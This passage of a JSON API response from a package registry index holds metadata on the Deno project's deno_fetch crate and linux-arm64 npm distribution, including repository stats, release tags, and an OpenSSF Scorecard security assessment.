,{"login":"piscisaureus","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_fetch/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_fetch/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_fetch/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_fetch/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_fetch/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_fetch/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T18:29:25.310Z","updated_at":"2022-11-07T18:29:25.310Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:25.784Z","updated_at":"2023-07-18T22:41:25.784Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":11161871,"name":"@deno/linux-arm64-glibc","ecosystem":"npm","description":"linux-arm64-glibc distribution of Deno","homepage":"https://deno.land","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":"deno","versions_count":96,"first_release_published_at":"2024-12-12T21:26:04.655Z","latest_release_published_at":"2026-08-27T17:36:32.631Z","latest_release_number":"2.9.6","last_synced_at":"2026-09-07T22:55:53.963Z","created_at":"2024-12-12T21:50:11.692Z","updated_at":"2026-09-08T19:45:04.305Z","registry_url":"https://www.npmjs.com/package/@deno/linux-arm64-glibc","install_command":"npm install @deno/linux-arm64-glibc","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"lts":"2.2.15","latest":"2.9.6"},"contentPolicy":null},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-09-04T18:13:25.000Z","size":249845,"stargazers_count":108384,"open_issues_count":1549,"forks_count":6373,"subscribers_count":1430,"default_branch":"main","last_synced_at":"2026-09-06T18:12:48.927Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-09-06T18:00:40.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":341189360,"owners_count":37094232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-09-06T02:00:05.694Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/G